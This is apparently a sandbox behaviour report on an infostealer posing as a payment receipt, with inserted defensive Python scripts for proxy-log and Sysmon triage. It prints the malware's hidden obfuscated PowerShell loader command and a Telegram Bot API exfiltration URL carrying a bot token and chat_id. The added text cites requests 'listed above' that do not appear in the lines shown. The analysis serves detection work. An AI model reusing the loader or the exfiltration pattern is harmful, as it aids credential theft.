            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736, 49737, 49739, 49740, 49744, 49756, 49765, 49774, 49781, 49792, 49800, 49806, 49825, 49833 (14 connections)
            Source: unknown | Network traffic detected: HTTP traffic on ports 49736, 49737, 49739, 49740, 49744, 49756, 49765, 49774, 49781, 49792, 49800, 49806, 49825, 49833 -> 443 (14 connections)
            Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
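The requests listed above form the check-in and exfiltration sequence of this stealer: an external-IP lookup against checkip.dyndns.org with a hard-coded legacy Internet Explorer User-Agent, a country lookup at reallyfreegeoip.org/xml/<ip>, then a multipart upload to the Telegram Bot API (sendDocument) that carries the bot token in the URL path and the chat_id in the query string. The following is an added example, not part of the Joe Sandbox report, showing how to triage proxy logs for that chain and pull the token and chat_id out as IOCs. The log-line layout, the rule names and the sample lines are constructed for the example; the hosts, User-Agent, bot token and chat_id are the ones recorded above. The rule keys on the request, not the response: the 404 the sandbox received does not change what the infected host attempted.

```python
import re
from urllib.parse import parse_qs, urlsplit

# User-Agent the sandbox recorded on every checkip.dyndns.org request
LEGACY_IE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

# Hypothetical proxy-log layout: <ts> <src> <method> <url> "<user-agent>" <status>
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'"(?P<ua>[^"]*)" (?P<status>\d{3})$'
)
# Bot API path layout: /bot<numeric id>:<secret>/<method>
TELEGRAM_PATH_RE = re.compile(
    r"^/bot(?P<token>\d+:[A-Za-z0-9_-]{20,})/(?P<api>send[A-Za-z]+)$"
)

# Constructed sample lines (not from the report) reproducing the observed
# sequence for one host, plus unrelated traffic from a second host.
SAMPLE_LOG = """\
2024-12-16T17:29:10Z 192.168.2.4 GET http://checkip.dyndns.org/ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" 200
2024-12-16T17:29:12Z 192.168.2.4 GET https://reallyfreegeoip.org/xml/8.46.123.189 "" 200
2024-12-16T17:29:21Z 192.168.2.4 POST https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=PW "" 404
2024-12-16T17:30:02Z 192.168.2.7 GET https://www.office.com/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" 200
"""


def parse_line(line):
    """Split one log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_telegram_ioc(url):
    """Return (bot_token, chat_id) for a Bot API send* URL, else None."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = TELEGRAM_PATH_RE.match(parts.path)
    if not m:
        return None
    chat_id = parse_qs(parts.query).get("chat_id", [None])[0]
    return m.group("token"), chat_id


def classify(event):
    """Map one request to a stage of the stealer's check-in/exfil sequence."""
    parts = urlsplit(event["url"])
    if parts.hostname == "checkip.dyndns.org":
        return "ip_lookup"
    if parts.hostname == "reallyfreegeoip.org" and parts.path.startswith("/xml/"):
        return "geo_lookup"
    if extract_telegram_ioc(event["url"]):
        return "telegram_exfil"
    return None


def triage_proxy_log(log_text):
    """Group matching requests by source IP and flag hosts that completed
    the IP-lookup -> Telegram upload chain, keeping the token as an IOC."""
    hosts = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev:
            continue
        stage = classify(ev)
        if not stage:
            continue
        rec = hosts.setdefault(
            ev["src"], {"stages": set(), "legacy_ua": False, "telegram": None})
        rec["stages"].add(stage)
        if ev["ua"] == LEGACY_IE_UA:
            rec["legacy_ua"] = True
        if stage == "telegram_exfil":
            rec["telegram"] = extract_telegram_ioc(ev["url"])
    for rec in hosts.values():
        rec["flagged"] = {"ip_lookup", "telegram_exfil"} <= rec["stages"]
    return hosts


if __name__ == "__main__":
    for src, rec in triage_proxy_log(SAMPLE_LOG).items():
        if rec["flagged"]:
            print(src, "stages:", sorted(rec["stages"]), "telegram:", rec["telegram"])
```

The extracted token and chat_id go into the IOC set and into the abuse report to Telegram; the legacy_ua flag on its own is a weak signal, so the chain condition (IP lookup followed by a Bot API upload from the same source) is what raises confidence.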
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe (dropped file)
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | File created: C:\Windows\resources\0809
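The two "File created" lines above are the endpoint telemetry that separates this chain from an ordinary installer: a script host (powershell.exe) writing a PE into a deeply nested directory under %LOCALAPPDATA%\Temp, and a binary launched from the user's Desktop creating an object under C:\Windows. The following is an added example, not part of the report, that applies those two rules to Sysmon Event ID 11 (FileCreate) records. The XML records are constructed for the example (paths copied from the lines above, plus one benign browser cache write), and the rule names are the example's own.

```python
import ntpath
import xml.etree.ElementTree as ET

# Script hosts whose PE drops into Temp are worth a look (example's own list)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed Sysmon Event ID 11 records; the first two mirror the sandbox's
# "File created" lines, the third is benign noise.
SAMPLE_EVENTS = """<Events>
  <Event>
    <System><EventID>11</EventID></System>
    <EventData>
      <Data Name="Image">C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
      <Data Name="TargetFilename">C:\\Users\\user\\AppData\\Local\\Temp\\globosely\\baadehavn\\stnner\\forslvedes\\Justificante pago-09453256434687.exe</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>11</EventID></System>
    <EventData>
      <Data Name="Image">C:\\Users\\user\\Desktop\\Justificante pago-09453256434687.exe</Data>
      <Data Name="TargetFilename">C:\\Windows\\resources\\0809</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>11</EventID></System>
    <EventData>
      <Data Name="Image">C:\\Program Files\\Mozilla Firefox\\firefox.exe</Data>
      <Data Name="TargetFilename">C:\\Users\\user\\AppData\\Local\\Temp\\cache-12.tmp</Data>
    </EventData>
  </Event>
</Events>"""


def parse_file_create_events(xml_text):
    """Return the EventData fields of every Event ID 11 record as a dict."""
    events = []
    for ev in ET.fromstring(xml_text).iter("Event"):
        if ev.findtext("System/EventID") != "11":
            continue
        events.append({d.get("Name"): d.text for d in ev.iter("Data")})
    return events


def evaluate(event):
    """Apply the two rules drawn from the report to one FileCreate record."""
    img_l = (event.get("Image") or "").lower()
    tgt_l = (event.get("TargetFilename") or "").lower()
    hits = []
    # Rule 1: a script host writes an .exe somewhere under the user's Temp.
    if (ntpath.basename(img_l) in SCRIPT_HOSTS
            and "\\appdata\\local\\temp\\" in tgt_l
            and tgt_l.endswith(".exe")):
        hits.append("script_host_dropped_pe_in_temp")
    # Rule 2: a binary run from the user profile creates something in C:\Windows.
    # Legitimate installers do this too, so treat it as corroborating evidence.
    if img_l.startswith("c:\\users\\") and tgt_l.startswith("c:\\windows\\"):
        hits.append("user_binary_writes_system_dir")
    return hits


def triage_file_events(xml_text):
    """Return (image, target, hits) for every record that matched a rule."""
    results = []
    for ev in parse_file_create_events(xml_text):
        hits = evaluate(ev)
        if hits:
            results.append((ev.get("Image"), ev.get("TargetFilename"), hits))
    return results


if __name__ == "__main__":
    for image, target, hits in triage_file_events(SAMPLE_EVENTS):
        print(hits, image, "->", target)
```

In production the same rules would run over the Sysmon channel (or the EDR equivalent) rather than a string, and rule 1 is the one to alert on; rule 2 on its own would page on every user-run installer.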
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Code function: 0_2_00406BFE
            Source: C:\Windows\SysWOW64\msiexec.exe | Code functions at 0307xxxx (15): 6_2_03075362, 6_2_0307D278, 6_2_0307C147, 6_2_0307C738, 6_2_0307C468, 6_2_0307CA08, 6_2_0307E988, 6_2_0307CFAC, 6_2_03073E09, 6_2_0307CCD8, 6_2_03077118, 6_2_0307F974, 6_2_0307E97C, 6_2_030729EC, 6_2_03079DE0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code functions at 21A5xxxx (39): 6_2_21A52968, 6_2_21A59C18, 6_2_21A5FC68, 6_2_21A517A0, 6_2_21A59328, 6_2_21A50B30, 6_2_21A51E80, 6_2_21A5D9A8, 6_2_21A5D999, 6_2_21A5DDF1, 6_2_21A5D540, 6_2_21A59548, 6_2_21A5D550, 6_2_21A5CCA0, 6_2_21A5CC8F, 6_2_21A5D0E8, 6_2_21A5D0F8, 6_2_21A55028, 6_2_21A5F805, 6_2_21A5F810, 6_2_21A50012, 6_2_21A55018, 6_2_21A50040, 6_2_21A58BA0, 6_2_21A5F3A8, 6_2_21A5F3B8, 6_2_21A5178F, 6_2_21A58B91, 6_2_21A50B20, 6_2_21A5EB08, 6_2_21A5EF60, 6_2_21A5EF51, 6_2_21A5E6A0, 6_2_21A5E6B0, 6_2_21A5EAF8, 6_2_21A5DE00, 6_2_21A51E70, 6_2_21A5E257, 6_2_21A5E258
            Source: C:\Windows\SysWOW64\msiexec.exe | Code functions at 2401xxxx (85): 6_2_240181D0, 6_2_24017B78, 6_2_2401B7A8, 6_2_24018FB0, 6_2_24013008, 6_2_2401DC19, 6_2_2401FC18, 6_2_24016024, 6_2_2401DC28, 6_2_2401BC2A, 6_2_24016030, 6_2_2401BC38, 6_2_24010040, 6_2_24013450, 6_2_24013460, 6_2_24016478, 6_2_24016488, 6_2_24010498, 6_2_2401E0A7, 6_2_2401C0B7, 6_2_2401E0B8, 6_2_240138B8, 6_2_2401C0C8, 6_2_240108F0, 6_2_2401A928, 6_2_2401A938, 6_2_2401E538, 6_2_2401C548, 6_2_2401E548, 6_2_24010D48, 6_2_2401C558, 6_2_2401119F, 6_2_240111A0, 6_2_2401E9C8, 6_2_2401C9D8, 6_2_2401E9D8, 6_2_240115E8, 6_2_2401C9E8, 6_2_240115F8, 6_2_24016A07, 6_2_24016A18, 6_2_24014620, 6_2_24014622, 6_2_24011A4F, 6_2_24011A50, 6_2_2401EE57, 6_2_2401CE67, 6_2_2401EE68, 6_2_24016E70, 6_2_24014A70, 6_2_24016E72, 6_2_2401CE78, 6_2_24014A78, 6_2_24011E98, 6_2_24011EA8, 6_2_240172C8, 6_2_240172CA, 6_2_24014ECC, 6_2_24014ED0, 6_2_2401F2E7, 6_2_240122F0, 6_2_2401D2F7, 6_2_2401F2F8, 6_2_24012300, 6_2_2401B307, 6_2_2401D308, 6_2_2401B318, 6_2_24017720, 6_2_24017722, 6_2_24015328, 6_2_24012748, 6_2_24012758, 6_2_24017B69, 6_2_24015777, 6_2_2401F778, 6_2_24015780, 6_2_2401D787, 6_2_2401F788, 6_2_2401B798, 6_2_2401D798, 6_2_24018FA1, 6_2_24012BA0, 6_2_24012BB0, 6_2_24015BD8, 6_2_24012FF9
            Source: Justificante pago-09453256434687.exe | Static PE information: invalid certificate
            Source: Justificante pago-09453256434687.exe, 00000000.00000000.1675896585.0000000000454000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs Justificante pago-09453256434687.exe
            Source: Justificante pago-09453256434687.exe | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs Justificante pago-09453256434687.exe
            Source: Justificante pago-09453256434687.exe.1.dr | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs Justificante pago-09453256434687.exe
            Source: Justificante pago-09453256434687.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/16@5/5
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Code function: 0_2_004021AA CoCreateInstance
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.ini
            Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | File created: C:\Users\user\AppData\Local\Temp\nsj7D4D.tmp
            Source: Justificante pago-09453256434687.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | File read: C:\Users\user\Desktop\Justificante pago-09453256434687.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Justificante pago-09453256434687.exe "C:\Users\user\Desktop\Justificante pago-09453256434687.exe"
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
